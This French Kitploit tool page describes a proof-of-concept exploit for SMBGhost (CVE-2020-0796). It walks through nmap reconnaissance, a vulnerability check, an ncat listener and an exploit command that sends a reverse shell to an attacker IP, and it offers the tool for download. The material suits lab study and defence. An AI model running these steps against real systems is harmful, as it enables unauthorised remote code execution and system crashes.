Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-CVE-2020-0796 — Preuve de concept d'exploitation pour CVE-2020-0796 (SMBGhost) ciblant Windows 10/Server SMBv3.1.1. Inclut la reconnaissance Nmap, l'analyse de vulnérabilité et la livraison de charge utile de shell inversé. | Kitploit
Outils/GitHubGitHub/hungdnvp/poc-cve-2020-0796
ReconnaissanceAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionOutil d'Accès à Distance
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

Preuve de concept d'exploitation pour CVE-2020-0796 (SMBGhost) ciblant Windows 10/Server SMBv3.1.1. Inclut la reconnaissance Nmap, l'analyse de vulnérabilité et la livraison de charge utile de shell inversé.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

**- Versions affectées*

- Windows 10 version 1903 pour systèmes 32 bits

- Windows 10 version 1903 pour systèmes ARM64

- Windows 10 version 1903 pour systèmes x64

- Windows 10 version 1909 pour systèmes 32 bits

- Windows 10 version 1909 pour systèmes ARM64

- Windows 10 version 1909 pour systèmes x64

- Windows Server, version 1903 (installation Server Core)

- Windows Server, version 1909 (installation Server Core)

Schéma de connexion du système

image-20240223154022321

Reconnaissance de la cible

Lancer Nmap pour scanner la plage réseau dans la zone DMZ

root@kitploit:~
map -sS 192.168.116.0/24

nmap: est le nom du programme de scan réseau**.**

-sS: Choisit la méthode de scan TCP SYN. Lors de ce scan, Nmap envoie un paquet SYN au serveur cible et observe la réponse. Si le serveur cible répond avec un paquet SYN-ACK, Nmap sait que le port est ouvert. Si le serveur cible répond avec un paquet RST, cela signifie que le port est fermé.

-192.168.116.0/24: L'adresse IP ou la plage d'adresses IP spécifique que vous souhaitez scanner. Dans ce cas, la plage d'adresses est 192.168.116.0/24, décrivant toutes les adresses IP de 192.168.116.1 à 192.168.116.254.

image-scanNmap

=> On observe que l'adresse IP de la machine victime 192.116.145 a le port 445 ouvert.

· Utiliser Nmap pour scanner les vulnérabilités sur la machine victime

root@kitploit:~
map -p445 –script smb-protocols 192.168.116.145

nmap: est le nom du programme de scan réseau.

-p445: Spécifie le port à scanner, dans ce cas le port 445. Le port 445 est généralement utilisé pour communiquer avec le service SMB (Server Message Block) sur les systèmes Windows.

--script smb-protocols: Sélectionne le script smb-protocols pour effectuer le scan. Ce script permet de vérifier et d'afficher des informations sur les versions du protocole SMB prises en charge sur le serveur cible.

192.168.116.145: L'adresse IP du serveur que vous souhaitez scanner. Dans ce cas, l'adresse IP configurée est 192.168.116.145

image-sanNmap2

- Le résultat obtenu par smb-protocols indique que la machine victime est susceptible de présenter une vulnérabilité exploitable SMBv3.1.1

- Pour être plus certain, continuer à vérifier l'exploitabilité de la vulnérabilité CVE-2020-0796 en exécutant un script python

[]: -https://github.com/ly4k/SMBGhost "code d'exploitation"

image-nmapcheck

=> Résultat Vulnerable -> détection de la vulnérabilité CVE 2020-0796 exploitable sur la machine victime.

Exploitation de la vulnérabilité, installation d'un code malveillant, création d'un canal de contrôle à distance

**Lancer une attaque Reverse_shell**

  • Démarrer la session avec Netcat en écoutant la connexion depuis la victime*
root@kitploit:~
ncat -lvp 4444
  • Lancer le script d'exploitation de CVE-2020-0796

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "code d'exploitation"

root@kitploit:~
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

image-attack

=> RÉSULTAT : La machine attaquante obtient l'exécution de code shell sur la machine victime.

image-result

Après une connexion réussie, l'attaquant peut désormais exploiter et exécuter du code arbitraire sur la machine victime avec les droits User de l'utilisateur dans la session de connexion.

À la fin de la session, la machine victime rencontre une erreur BlueScreen et redémarre automatiquement.

image-end

*L'exécution de l'exploitation peut entraîner l'endommagement du système ciblé*

Télécharger l’outil